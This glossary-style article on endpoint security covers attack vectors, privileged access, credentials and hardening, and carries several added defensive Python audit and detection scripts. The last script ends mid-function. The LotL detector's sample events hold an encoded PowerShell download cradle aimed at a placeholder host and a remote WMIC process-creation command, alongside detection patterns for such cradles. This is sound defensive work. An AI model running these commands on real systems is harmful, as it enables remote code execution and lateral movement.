What Endpoint Security Is & Why It's Needed

Endpoint security refers to the strategies and technologies for preventing, containing, mitigating, and remediating threats to endpoints. Threats to endpoints can come in the form of external attacks as well as insider threats, which may be either malicious or unintentional in nature. A compromised endpoint can give an attacker a foothold within an environment, enabling them to launch further attacks on systems to access data and compromise additional endpoints via lateral movement.

Whereas endpoint security for individual consumers is almost entirely focused on technologies like antivirus deployed on the device, enterprise strategies such as hardening, privilege separation, and least privilege rely heavily on centralized management across the corporate network to administer patches and configuration changes, deploy policy updates, gather logs, and more.

Since a corporate IT network is essentially a linkage of endpoints, endpoint integrity and security may be prioritized before implementing security at the network layer. Many IT security solutions provide capabilities that cover multiple security categories across endpoint, network, data, and identity-based models.

In this glossary post, we will explore endpoint security, including the challenge of managing and securing endpoints, some of the key endpoint attack vectors, and the strategies, technologies, and solutions for implementing endpoint security.

What is an Endpoint?

An endpoint itself can be defined as any device or hardware—virtual or physical—that connects to the corporate environment, has a TCP/IP (v4 or v6) address, or uses another protocol for networking (wired or wireless). An endpoint can be anything from end-user devices, such as desktops, laptops, tablets, and smartphones to servers, medical devices, IoT devices and sensors, industrial control systems (ICS), point-of-sale (PoS) devices, ATMs, printers, network switches, routers, and much more.

Endpoint security strategies and solutions aim to protect endpoints whether they are persistently connected to the network or only transiently connected. After all, an endpoint that has no network connection or removable media access still carries the risk of the user in front of the terminal itself. Endpoint security software may be deployed as a client or agent installed on each endpoint, managed centrally through an agentless approach, delivered from the cloud, or as a combination of these.

Endpoint security is one of the broadest categories of cybersecurity, overlapping, integrating with, and complementing other important areas, such as network security, data security, identity-based security, and application security. The diversity of endpoint security solutions reflects the growing diversity of endpoints themselves. While some endpoint security and management technologies can be applied across a broad range of endpoints—perhaps even all the devices in a corporate environment—some technologies are device or platform-specific (Windows, macOS, Unix, Linux, Android, Azure, AWS, Google Cloud etc.). These represent unique challenges for monitoring, managing, detecting, and responding to modern threats.

The Differences Between Rules-Based, Signature-based, and Behavioral-based Security

Endpoint security technologies often leverage the following three approaches to detect, prevent, and/or mitigate threats:

Pattern matching and signature-based (e.g. traditional antivirus, vulnerability management, etc.): This entails relying on threat signatures to block known threats, and/or heuristics to block suspicious code or actions that share similarities with known threats.

Rules-based and enforcement of advanced policies (e.g. privileged access management, endpoint firewalls, encryption, etc.): This entails applying rules and policies that enforce security best practices, such as least privilege, block lists and allow lists, endpoint firewall rules, and more. Because a rule either matches or it does not, the results are highly predictable.

Behavior-based (endpoint detection and response, etc.): Modern endpoint security solutions may apply advanced behavioral analysis, machine learning, and even some forms of artificial intelligence to identify threats or inappropriate access. These solutions can process information locally or rely on management servers to aggregate information for advanced detection and response.

Endpoint security strategies themselves encompass such practices as endpoint hardening, endpoint isolation, endpoint lifecycle and policy management, and more. These are typically rule-based, since they enforce a defined configuration and policy state rather than matching known-bad patterns.

Challenges in Securing Endpoints

Evolving cyberthreats, increasingly complex and diverse endpoint environments, corporate misalignment of security technologies to threats, and an ever-more stretched IT team are just some of the many colliding factors that put an organization’s universe of endpoints at risk, and potentially jeopardize the entire network. On top of this, many of the technologies deployed as part of an endpoint security strategy may provide overlapping capabilities in some areas, while gaps remain in others. Overlapping features may also cause incompatibility issues and produce unpredictable results, or negatively impact endpoint stability.

Let’s explore some of the most significant challenges and weaknesses present with enterprise endpoints:

Lack of visibility into the endpoint estate. Most organizations struggle to understand the scope of their endpoint estate, let alone how to manage it. An organization may have millions of endpoints, and even tens of thousands of undiscovered or unknown endpoints that connect to the network. The inability to know the health of all of these endpoints and govern the activities performed on them presents a high risk for the network.

Overwhelming number and diversity of endpoints: The sheer number and diversity of endpoints within any corporate environment today presents massive challenges and makes it hard to standardize security. Non-traditional endpoints proliferate. IoT devices, such as sensors, security cameras, healthcare devices, etc., are now commonplace. Many IT teams struggle to discover and securely onboard legitimate devices at scale. Compounding this issue, many IoT and edge computing devices commonly have severe security drawbacks, such as hardcoded credentials and the inability to harden software or update firmware. They may use unsafe or uncommon protocols, and even have built-in backdoors. Because most IoT devices have little computing power, they most likely cannot run security software or host an agent.

Sophisticated attacks on industrial control systems (ICS), such as Stuxnet, have been a growing concern over the last decade. ICS endpoints were traditionally “air-gapped”, meaning they were kept separate from internet-facing networks. However, these critical infrastructure endpoints are, like everything, becoming increasingly connected, and thus exposed to cyber risk. ICS endpoints can include programmable logic controllers (PLCs), supervisory control and data acquisition (SCADA) systems, remote terminal units (RTUs), intelligent electronic devices (IEDs), human machine interfaces (HMIs), and much more.

The rise of the virtual desktop is another challenge. Virtual desktops share many of the endpoint security risks of physical desktops, but they add further complexity to the environment due to their dynamic and ephemeral nature. And, of course, IT still has desktops (and users), servers, smartphones, network devices, and all the other traditional endpoints (and the accompanying software, applications, etc.) to contend with as well.

Evolving threats and attacker tooling: Threat actors continue to learn new tricks and acquire more sophisticated tools with powerful automation capabilities. Modern attackers can easily scale attacks across tens of thousands of endpoints and target across organizations, types of devices, and many other dimensions. Attackers can readily acquire toolkits off the dark web, including nation-state caliber tools. These tools range from credential-theft tools and password dictionaries to advanced, polymorphic malware that may incorporate machine learning. In addition, malware (viruses, trojans, ransomware, spyware, etc.) is ever-improving at evading antivirus and other security defenses, and at blending in with normal processes. Even phishing, particularly spear phishing, is getting more savvy. Spear phishers may be able to rapidly scan many resources and even incorporate machine learning to craft phishing messages tailored to their target with eerie precision.

While the vectors used by threat actors are too broad to cover here, one worth mentioning is Living off the Land (LotL) attacks, which refers to leveraging tools or features that preexist within the target’s environment. These are typically fileless attacks because no malicious binary needs to be written to disk or executed. LotL attacks essentially turn a system’s own native applications and commands against itself. Because these attacks leverage legitimate and authorized tools that are likely allowed by IT and that pre-exist on the system, they are very difficult to detect and stop. Tools commonly abused for fileless attacks are administrative and troubleshooting tools such as PowerShell, VBScript, WMI, PsExec, and the Windows Script Host executables.

Finally, another potential threat that has lurked on endpoints for decades, but gets little attention today, is spyware. While this unwanted software is often merely an annoyance, it can compromise privacy, leak data, and potentially perform other malicious actions.
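The LotL tools listed above can be caught by looking at how they are invoked rather than at which binary runs. The following Python script is an added example, not part of the original post, that scans constructed process-creation events (a simplified stand-in for Sysmon or EDR telemetry; the field names are assumptions) for an Office application spawning a script host, an encoded PowerShell command containing a download cradle, remote process creation through WMIC, the PsExec service binary, and a script host launched from a user-writable path:

```python
"""Flag common Living-off-the-Land (LotL) patterns in process-creation events.

Added example, not code from the original post. The event records are a
constructed, simplified stand-in for EDR or Sysmon process-creation telemetry;
the field names (host, user, parent, image, cmdline) are assumptions.
"""
import base64
import re

# Office applications that should not normally spawn a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc ...).
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Download-cradle and in-memory execution keywords worth escalating on.
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|"
                       r"Invoke-Expression|\bIEX\b|FromBase64String", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        # -EncodedCommand is base64 over UTF-16LE text.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Return (severity, technique, evidence) tuples for one process-creation event."""
    image, parent, cmd = _basename(ev["image"]), _basename(ev["parent"]), ev["cmdline"]
    findings = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(("high", "office application spawned a script host", f"{parent} -> {image}"))
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_powershell(cmd)
        if decoded is not None:
            sev = "critical" if CRADLE_RE.search(decoded) else "medium"
            findings.append((sev, "encoded PowerShell command", decoded[:80]))
    if image == "wmic.exe" and re.search(r"process\s+call\s+create", cmd, re.I):
        scope = "remote" if re.search(r"/node:", cmd, re.I) else "local"
        findings.append(("high", f"WMIC {scope} process creation", cmd))
    if image == "psexesvc.exe":
        findings.append(("high", "PsExec service binary executing", f"parent={parent}"))
    if image in ("wscript.exe", "cscript.exe") and re.search(r"\\(temp|appdata)\\", cmd, re.I):
        findings.append(("medium", "script host run from a user-writable path", cmd))
    return findings


def analyze(events):
    """Flatten per-event findings into alert records."""
    return [{"host": ev["host"], "user": ev["user"], "severity": sev,
             "technique": tech, "evidence": evidence}
            for ev in events for sev, tech, evidence in analyze_event(ev)]


def _enc(ps):
    # Helper used only to build the constructed sample below.
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample events (not real telemetry).
EVENTS = [
    {"host": "WS01", "user": "jdoe", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"host": "WS01", "user": "jdoe", "parent": "WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    {"host": "WS02", "user": "svc_backup", "parent": "services.exe",
     "image": r"C:\Windows\PSEXESVC.exe", "cmdline": "PSEXESVC.exe"},
    {"host": "WS03", "user": "jdoe", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic /node:WS04 process call create "cmd.exe /c whoami"'},
    {"host": "WS03", "user": "jdoe", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\jdoe\AppData\Local\Temp\inv.vbs"},
]

if __name__ == "__main__":
    for alert in analyze(EVENTS):
        print(alert)
```

The first event (an interactive, unencoded PowerShell launched from Explorer) produces nothing, which is the point: the detection keys on parent-child relationships, encoding, and remote-execution switches, not on the presence of PowerShell itself, so it does not drown the analyst in the legitimate admin use that makes LotL attractive in the first place.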

Overprovisioning of privileges/privileged access: Endpoints typically have far more privileged access than absolutely necessary. Additionally, applications, operating systems, and other software all tend to have default system privileges that provide more capabilities and access rights than is safe or typically needed for daily operations.

Often, the privileged access rights are persistent (also called “standing privileges”), meaning they are constantly in an active state, ready to be used, or exploited. Each instance of excessive privilege opens up the endpoints and, by extension, the enterprise, to a privilege-based attack. With privileged access, malware or an attacker can execute malicious code to gain a foothold. A threat actor may be able to use available privileges again to perform malicious actions on the compromised endpoint, or even to move laterally to other endpoints in the corporate network, compromising more sensitive assets along the way. According to research published by IBM, 70% of attacks involve attempts to move laterally. Almost every single cyberattack today—whether to gain initial access, or to move about once on the inside—involves the use of privileged access, so managing privileged access is critical to endpoint security. Different types of endpoints, applications, software, and users (human and machine) each have unique implications with regard to privileged access, and it must be managed. For instance, default privileges are created and managed differently across different operating systems. Here are a few examples:

  • In Windows systems, the Administrator account holds superuser privileges. Only the built-in SYSTEM account is more powerful. Each Windows computer has at least one local administrator account with rights that typically far exceed what is needed, translating into a bloated threat surface. Administrative rights should be removed from most non-IT users as a best practice so the typical user only has standard account rights. Some endpoints should be configured with only guest account access, which generally limits rights even further, to just basic application access and internet browsing.
  • In Linux and Unix-like systems, the superuser account, called ‘root’, is virtually omnipotent over the system, with unrestricted access to all commands, files, directories, and resources. Organizations should eliminate direct root logins and put tight security controls and session auditing around any superuser access. The sudo (“superuser do”) command, which allows a user to temporarily elevate privileges to root level without having direct access to the root account and password, may suffice in some instances, but it introduces its own security and management limitations.
  • For macOS endpoints, IT may need to create non-privileged accounts for users (standard users), and manage the local administrator account.
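A first step toward managing these defaults is to find out who actually holds standing superuser-equivalent rights on each platform. The following Python script is an added example, not code from the original post: it audits a constructed inventory (an assumed format for what `net localgroup`, `getent group`, `dscl` or an agent would report, with assumed group names and an assumed IT-admin roster) for non-IT accounts in the Administrators, sudo/wheel or admin groups, extra UID 0 accounts, passwordless unrestricted sudo rules, and an enabled Guest account:

```python
"""Audit standing privileged access across a mixed Windows/Linux/macOS fleet.

Added example, not code from the original post. The inventory format is a
constructed, simplified stand-in for what an agent or a script such as
`net localgroup`, `getent group`, or `dscl` would collect; the host names,
group names per OS and the IT-admin roster are assumptions.
"""

# Local groups that confer superuser-equivalent rights, per platform.
PRIVILEGED_GROUPS = {
    "windows": {"administrators"},
    "linux": {"sudo", "wheel"},
    "macos": {"admin", "wheel"},
}
# Built-in accounts expected in those groups (should be vaulted/LAPS-managed, not used daily).
BUILTIN_ACCOUNTS = {"administrator", "root"}
# Assumed roster of people whose role justifies local admin rights.
IT_ADMINS = {"it-admin1", "it-admin2"}


def audit_endpoint(ep, it_admins=IT_ADMINS):
    """Return findings for one endpoint's standing privileges."""
    findings = []
    os_name = ep["os"].lower()
    for group, members in ep.get("groups", {}).items():
        if group.lower() not in PRIVILEGED_GROUPS.get(os_name, set()):
            continue
        for member in members:
            m = member.lower()
            if m in BUILTIN_ACCOUNTS or m in it_admins:
                continue
            findings.append({"host": ep["host"], "account": member,
                             "issue": f"non-IT account holds standing membership in '{group}'"})
    # Linux/macOS: any extra UID 0 account is a second root, regardless of groups.
    for acct in ep.get("uid0_accounts", []):
        if acct.lower() != "root":
            findings.append({"host": ep["host"], "account": acct,
                             "issue": "additional UID 0 account (root equivalent)"})
    # Anyone with an unrestricted NOPASSWD sudo rule can become root silently.
    for rule in ep.get("sudoers", []):
        if "NOPASSWD" in rule.upper() and "ALL" in rule.upper():
            findings.append({"host": ep["host"], "account": rule.split()[0],
                             "issue": f"passwordless unrestricted sudo rule: {rule}"})
    if os_name == "windows" and ep.get("guest_enabled"):
        findings.append({"host": ep["host"], "account": "Guest",
                         "issue": "built-in Guest account enabled"})
    return findings


def audit_fleet(endpoints):
    """Findings for the whole fleet, plus a per-host count for prioritisation."""
    findings = [f for ep in endpoints for f in audit_endpoint(ep)]
    per_host = {}
    for f in findings:
        per_host[f["host"]] = per_host.get(f["host"], 0) + 1
    return findings, per_host


# Constructed inventory (not real data).
ENDPOINTS = [
    {"host": "WS01", "os": "windows", "guest_enabled": False,
     "groups": {"Administrators": ["Administrator", "jdoe", "it-admin1"], "Users": ["jdoe"]}},
    {"host": "WS02", "os": "windows", "guest_enabled": True,
     "groups": {"Administrators": ["Administrator"], "Users": ["asmith"]}},
    {"host": "SRV01", "os": "linux", "uid0_accounts": ["root", "toor"],
     "groups": {"sudo": ["it-admin2", "deploy"], "wheel": []},
     "sudoers": ["deploy ALL=(ALL) NOPASSWD: ALL", "it-admin2 ALL=(ALL) ALL"]},
    {"host": "MAC01", "os": "macos",
     "groups": {"admin": ["root", "bwong"]}},
]

if __name__ == "__main__":
    all_findings, counts = audit_fleet(ENDPOINTS)
    for f in all_findings:
        print(f"{f['host']:6} {f['account']:10} {f['issue']}")
    print(counts)
```

Note that the built-in Administrator and root accounts are deliberately not flagged for group membership; the expectation is that they exist but are vaulted and never used interactively, which is a separate check against the password vault rather than the group list.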

Endpoint Vulnerabilities: While reputable commercial vendors (such as Microsoft with its monthly Patch Tuesday updates) regularly release vulnerability fixes (called patches) for their software, applications, and firmware, vulnerabilities represent one of the largest exposures organizations have that can potentially be exploited by malware, threat actors, and insiders. Even if an organization has a world-class patching and vulnerability management program, almost any mid-to-large sized organization will have thousands of software vulnerabilities strewn across its fleet of endpoints, because remediating all of them is infeasible. Fixing a vulnerability on an endpoint, as with any system update, is not a riskless activity in itself and may cause downtime or create other problems, so the risks and benefits must be closely assessed. Indeed, many vulnerabilities are known and present across an enterprise for many years. Of course, the risk is heightened when there is a known exploit targeting a vulnerability. According to a Ponemon/Morphisec study, it takes organizations, on average, 97 days to apply, test, and fully deploy patches. Here are the three main types of software vulnerabilities found on endpoints:

  • Firmware vulnerabilities: Firmware is the code/software that is built into a specific hardware and enables operation of basic device-level functions. On some devices, firmware is loosely considered the device’s operating system. Some examples include iOS for Apple iPhones. With the proliferation of devices, such as IoT and smartphones, firmware vulnerabilities have become a much greater concern in recent years. However, firmware vulnerabilities with massive security ramifications can also arise in mature vendor products. Because they enable operation of basic functions, firmware vulnerabilities can be exceedingly dangerous, essentially giving a threat actor root access to a device and/or completely undermining security features like encryption.
  • Operating system (OS) vulnerabilities: These can be errors or bugs in code or actual features, such as permitting certain types of unnecessary access, that may pose risk. Common operating systems found in enterprise environments include Windows, macOS, Unix, and Linux.
  • Application vulnerabilities are bugs or weaknesses in installed applications. Vulnerabilities could include anything from a privilege escalation flaw in an application, to backdoor root access, to embedded default credentials. Unlike firmware and operating systems, applications can often be installed by end users with the privileges they already have. Without the vetting of IT, these self-provisioned applications (known as shadow IT) pose an elevated risk of introducing vulnerabilities or other security risks.

Deficiencies in native OS security and toolsets. While Windows has mature toolsets built into the OS, and Linux has some advanced auditing capabilities, macOS has lagged in endpoint security, management, and monitoring. Yet, as mature as Windows is, many of its toolsets can only be considered basic, and fall far short of the security needed within enterprise environments. For example, while Windows BitLocker encryption is often an important part of an enterprise’s endpoint security strategy, other security components, such as Windows Defender Antivirus, Windows Firewall (called Windows Defender Firewall in Windows 10), the Local Administrator Password Solution (LAPS), etc., provide only basic protections, and are often disabled entirely within enterprises, which opt for more robust enterprise-class solutions from security vendors. Another example is sudo, the program on Unix and Linux systems that lets a user run commands with elevated privileges without being given the root password. Sudo certainly helps mitigate threats when there is no alternative; however, sudo itself has many limitations and introduces its own security risks, and it falls far short of the enterprise-class privileged access security needed for these environments.

Shadow IT refers broadly to any IT technology within a corporate environment that is not provisioned by IT. It can be installed on the endpoint itself, accessed via the cloud, or even be an unauthorized device connected to the network. When end users self-provision applications or connect unauthorized endpoints to the network, it can introduce a number of security and operational issues. A shadow IT application may be incompatible or interfere with other network systems, suffer from dangerous vulnerabilities, have excessive privileges, and may even introduce a backdoor. Controlling shadow IT has been a long-standing IT challenge. During the early months of the coronavirus pandemic and the mass shift to remote work, shadow IT spiked as users tried to equip themselves with tools that could help them maintain productivity outside the walls of the corporate office. In some cases, this included insecure remote access and teleconferencing tools, some of which were quickly exploited by attackers, with devastating results.

Insider Threats: Insiders (employees, vendors, contractors, etc.) have always presented one of the most significant risks to corporate endpoints and networks, since they already have access on the endpoint and tend to fly under the radar of many traditional threat detection solutions. For instance, an employee could be induced to download malicious content from a spam or phishing email, or to visit a malicious website that initiates a drive-by download of malware. If the insider is ill-intentioned and possesses superuser rights or is otherwise over-provisioned with privileges, they can easily inflict catastrophic damage. Insider threats, when they happen, tend to be the most harmful. The 2019 Human Factor Report by Proofpoint found that more than 99% of threats observed required human interaction to infect user devices.

Immature password lifecycle management and authentication: Endpoints, whether desktops, servers, mobile devices, or IoT, almost always have credentials. Many of these credentials are privileged, which means they allow the user (human or machine) to perform powerful functions or give them sensitive device or application access. According to Forrester Research, over 80% of breaches today involve privileged credentials. Verizon’s 2020 Data Breach Investigations Report (DBIR) found that threat actors are increasingly prioritizing acquisition of credentials over deployment of malware, and why not: with the right credentials, they immediately get access to the network. Unfortunately, poor, incomplete password management practices are commonplace within enterprise environments. Here are just a few:

  • Credentials are manually managed, resulting in poor practices, such as a lack of password complexity and length, password reuse, etc. Low password complexity and length make it easier for automated cracking tools to guess the correct password. Password reuse is tremendously risky because if a duplicated password is compromised or stolen in one instance, those stolen credentials can potentially be used to compromise all the other endpoints that share the same credentials. When employees reuse the same passwords for their personal endpoints and applications (which generally have lower levels of security than their corporate counterparts), those credentials pose a considerable risk to the corporate environment as well.
  • Default and hardcoded passwords may be present in IoT, legacy applications, and various networked devices. Attackers can also recover these from compiled code using readily available tools, even when developers try to obfuscate them. Also, since the same passwords may be used across many devices of the same type to simplify setup at scale, this risk is equivalent to that of reused passwords. Once a class of device’s passwords are known, that information can be used to compromise similar devices, either at the same company or across all the companies that deploy those devices and did not change the default implementation.
  • Credentials are often shared between users, particularly to perform IT administration tasks. This not only increases the risk of password exposure, it also makes it almost impossible to trace all activity occurring on an endpoint (e.g. a server) to a single user, which is a requirement for many compliance and audit initiatives.
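The three practices above can be checked mechanically against a credential inventory. The following Python script is an added example, not part of the original post; its inventory, default-credential list and strength thresholds are constructed and assumed, and it handles plaintext only to keep the example self-contained (a real audit would compare salted hashes pulled from a vault or discovery scan):

```python
"""Audit an endpoint credential inventory for default, reused, weak and shared passwords.

Added example, not code from the original post. The records below are
constructed; in practice the inventory would come from a password vault or
discovery scan, and you would compare salted hashes rather than handle
plaintext. SHA-256 is used here only as a reuse fingerprint, not as a
password-storage scheme. The default-credential list is a small assumed sample.
"""
import hashlib
import re
from collections import defaultdict

# Assumed sample of factory defaults; real lists are far longer and vendor-specific.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("admin", "password"), ("admin", "1234"),
                       ("root", "root"), ("root", "toor"), ("administrator", "")}

MIN_LEN = 12          # below this, automated guessing is cheap regardless of charset
PASSPHRASE_LEN = 16   # at or above this, a long low-complexity passphrase is acceptable


def fingerprint(password):
    """Reuse fingerprint (not a storage hash: no salt, no stretching)."""
    return hashlib.sha256(password.encode()).hexdigest()[:16]


def is_weak(password):
    """Short, or short-ish with fewer than three character classes."""
    classes = sum(bool(re.search(p, password)) for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^\w\s]"))
    if len(password) < MIN_LEN:
        return True
    return len(password) < PASSPHRASE_LEN and classes < 3


def audit_credentials(creds):
    findings = []
    by_fp = defaultdict(list)
    for c in creds:
        dev, acct, pw = c["device"], c["account"], c["password"]
        if (acct.lower(), pw) in DEFAULT_CREDENTIALS:
            findings.append({"device": dev, "account": acct, "issue": "default-credential"})
        if is_weak(pw):
            findings.append({"device": dev, "account": acct, "issue": "weak-password"})
        if c.get("shared"):
            findings.append({"device": dev, "account": acct, "issue": "shared-account"})
        by_fp[fingerprint(pw)].append((dev, acct))
    # Same password on more than one device: one compromise unlocks all of them.
    for users in by_fp.values():
        if len({dev for dev, _ in users}) > 1:
            peers = ", ".join(f"{d}/{a}" for d, a in users)
            for dev, acct in users:
                findings.append({"device": dev, "account": acct,
                                 "issue": "password-reuse", "detail": peers})
    return findings


# Constructed inventory (not real credentials).
CREDENTIALS = [
    {"device": "cam-01", "account": "admin", "password": "admin", "shared": False},
    {"device": "cam-02", "account": "admin", "password": "admin", "shared": False},
    {"device": "sw-core", "account": "netops", "password": "Summer2020!", "shared": True},
    {"device": "srv-db", "account": "dba", "password": "Summer2020!", "shared": False},
    {"device": "ws-15", "account": "jdoe", "password": "correct horse battery staple 9", "shared": False},
]

if __name__ == "__main__":
    for f in audit_credentials(CREDENTIALS):
        print(f"{f['device']:8} {f['account']:8} {f['issue']:18} {f.get('detail', '')}")
```

The two cameras illustrate the point made above about device classes: they are flagged both as default credentials and as reuse, because fixing the default on one of them without changing the other leaves the second device compromised by anyone who already knew the password.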

Inadequate encryption: Password- and encryption-cracking tools are getting increasingly powerful, and the hardware they run on gets cheaper every year. Yesterday’s encryption standards (deprecated algorithms, short keys, and weak key management) can’t always withstand modern attacks. Of course, sometimes endpoints lack proper encryption altogether, meaning the data can be easily read and compromised should an unauthorized user or threat actor gain access.

Lost or stolen endpoints: In the years of mainframes and desktop computing devices, stolen devices were a rarity. However, once devices went mobile, the number of lost or stolen enterprise devices soon skyrocketed. Stolen or lost laptops, smartphones, and other devices can create security and compliance risk, especially if the information or access provided by the device is sensitive. The potential for security, legal, and brand fallout increases substantially if the device was not properly secured, for example if it lacked adequate password protection or encryption.

Insecure remote access pathways: An increasingly mobile workforce, and the large-scale shift to work from home during the coronavirus pandemic, means endpoints are often outside the network perimeter and connecting remotely via home networks and unmanaged WiFi. While RDP, VNC, and SSH can provide basic remote access, they suffer from serious operational and security limitations when extended to many common use cases, including home offices. RDP exposed directly to the internet is a common initial-access vector, so organizations using it should never expose it directly and should wrap additional security and connectivity controls (such as multi-factor authentication and a gateway or broker) around it to ensure remote access sessions are not exposed. In addition, VPNs should never be used on an employee’s personal devices (BYOD) for connecting to corporate networks. Vendor endpoints and internal endpoints that need to perform privileged access remotely require more robust technologies. VPNs can’t granularly control, monitor, or report on privileged access; only access in general. Another security issue is that attackers often plant remote access technologies on targeted endpoints (such as a vendor’s or IT service provider’s support systems). The attackers then leverage the remote access on those devices as a jumping-off point for attacks on the vendor’s or IT service provider’s customers. Almost all cyberattacks leverage remote access as a vector, so it’s a critical security piece to get right.

The use of personal devices (BYOD) for work introduces risks and challenges. A personal device may lack many of the endpoint security protections and hardening that are applied to corporate-provisioned devices. It’s also possible that family members or housemates share the device and have accounts on it too. Any of these users’ activities could potentially imperil the corporate network. BYOD and VPN should never mix, yet organizations frequently allow personal devices to tunnel into the corporate network this way. Another complication that occurs with BYOD is what to do when a device is lost or stolen. While it may be in the company’s best interest to initiate an immediate remote data wipe, the employee may object due to the potential loss of content with high personal value, such as family pictures or videos.

Vendor access/vendor endpoints represent perhaps the weakest cybersecurity link for most organizations. According to research published by Opus & Ponemon, the average organization shares confidential and sensitive information with approximately 583 third parties. Threat research published by BeyondTrust found that organizations have, on average, 182 vendors logging into their systems every week. That adds up to a lot of potential security “weakest links!” The Opus/Ponemon report found that 59% of companies incurred a breach due to a vendor, while the BeyondTrust report put that number at 58%. Why are so many organizations incurring breaches as a result of vendor endpoints and access? VPNs and many other commonly used technologies don’t provide the granular access controls needed. Many organizations simply lack visibility into all the vendor endpoints accessing their systems, let alone what is occurring during the sessions, whether connecting remotely or on-premise. Do the vendor’s own endpoint security standards meet those of your enterprise? How do you enforce and validate that? Do some of a vendor’s employees use personal devices to access your network? What happens if these employees are terminated or leave; could their access remain as an orphan account? The vendor endpoint security risks are massive, but since vendors play such an important role, getting the security piece correct is imperative for every organization.

Misconfigured endpoints: Poor endpoint configurations can not only hamper operations, but also introduce device, operating system, and application vectors that make it easy for an attacker or piece of malware to access data or assert control over resources. Examples of misconfigurations or poor settings could involve open ports, outdated exceptions, insecure protocols allowed, etc. This is the basis for hardening guidelines that should be implemented and verified on every endpoint.

10 Best Practices for Endpoint Security

No single strategy or technology is by itself sufficient to protect your entire, heterogeneous endpoint universe from all threats. Some strategies (e.g. endpoint hardening) and technologies (e.g. privilege management) may be effective security controls against the vast majority of threats on any type of endpoint. Other strategies (e.g. remote wiping, anti-theft protection, etc.) and technologies (e.g. antivirus) may only work, or be applicable, for specific types of endpoints. The following endpoint security best practices should be adopted by every enterprise:

1. Define, Communicate, & Consistently Apply Your Endpoint Security Policy: Your endpoint security policy is a living, evolving document that should be part of your overarching IT security policy. It should define best practices and how they are to be applied. The policy should define strategies, technologies, and data ownership. For instance, if your organization allows BYOD, the policy should clearly define what data is owned by the company, what data belongs to the end user, and what should happen in case of a lost or stolen device. Any BYOD device used for corporate access should also have some form of mobile device management installed to separate personal and corporate resources and provide other security functions. Your policy should also establish what security controls you will put around vendor access, and which security controls you expect the vendor to implement around their own endpoints. Finally, ensure there is a method in place to measure, test, and audit all of these policies to ensure they are functioning as desired.

2. Discover and onboard, or deny access to, endpoints: The next step is the continuous one of finding and inventorying all the various endpoints that connect to your network and onboarding them. This also implies applying your organization’s security policies to the endpoints after they are discovered. In some cases, this step will occur proactively, such as when IT is specifically provisioning a device for a user or deploying a server. In other cases, it will occur reactively, such as when a new, unknown device touches the network. Devices should also be properly registered and monitored for issues, necessary updates, and to reconfirm overall health status. And if a device is identified that should not be present, policies, procedures, and automation should allow it to be disconnected, placed on a guest network, or segmented in some other way that protects the rest of your network and endpoints.

3. Endpoint hardening, which is really a subset of actions aligned with the principle of least privilege (PoLP) described in the next practice, involves removing or disabling unnecessary programs, access, embedded or other features to condense the attack surface. It is a continuous process performed throughout the lifecycle of technology, from initial installation, through configuration, maintenance, and support, to end-of-life decommissioning. Endpoint hardening practices vary by endpoint, with more complex and powerful endpoints generally requiring more steps. Endpoints should always be hardened before being connected to the internet or corporate networks. Application and operating system hardening are two of the most important aspects of endpoint hardening. OS hardening can entail removing unnecessary drivers, file sharing, libraries, software, services, and functionality; encrypting local storage; tightening registry and other system permissions; and implementing privileged user controls. Application hardening can entail restricting app-to-app communications, removing or turning off unneeded features, eliminating embedded credentials and replacing them with API calls that retrieve credentials from a vault at runtime, etc.
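Hardening guidelines (and the misconfiguration checks mentioned under challenges) are only useful if they are verified continuously. The following Python script is an added example, not code from the original post: it compares constructed endpoint records against an assumed baseline (the setting names, roles and port allow-lists are illustrative, not a published benchmark), treats an unreported setting as a failed control, and flags unexpected listeners on legacy or remote-admin ports:

```python
"""Check endpoints against a hardening baseline and report configuration drift.

Added example, not code from the original post. The baseline keys, the roles
and the port allow-lists are assumptions chosen to illustrate the checks a
hardening guideline typically calls for; the endpoint records are constructed.
A real implementation would read settings via an agent, MDM, or configuration
management and would carry the organisation's own baseline.
"""

# setting -> (required value, severity, rationale)
BASELINE = {
    "smb1_enabled": (False, "critical", "SMBv1 is an obsolete protocol with known wormable exploits"),
    "rdp_nla_required": (True, "high", "RDP without NLA exposes the logon screen pre-authentication"),
    "disk_encryption": (True, "high", "a lost or stolen device must not expose data"),
    "guest_account_enabled": (False, "medium", "anonymous local logon"),
    "local_admin_password_managed": (True, "high", "unmanaged local admin password enables lateral movement"),
    "autorun_enabled": (False, "medium", "removable-media code execution"),
}
# Ports a given role is allowed to listen on; anything else is drift.
ALLOWED_PORTS = {"workstation": set(), "server": {22, 443}}
# Legacy or remote-admin services that raise the severity of an unexpected listener.
HIGH_RISK_PORTS = {21, 23, 135, 139, 445, 3389, 5900}


def check_endpoint(ep):
    findings = []
    settings = ep.get("settings", {})
    for key, (required, severity, why) in BASELINE.items():
        if key not in settings:
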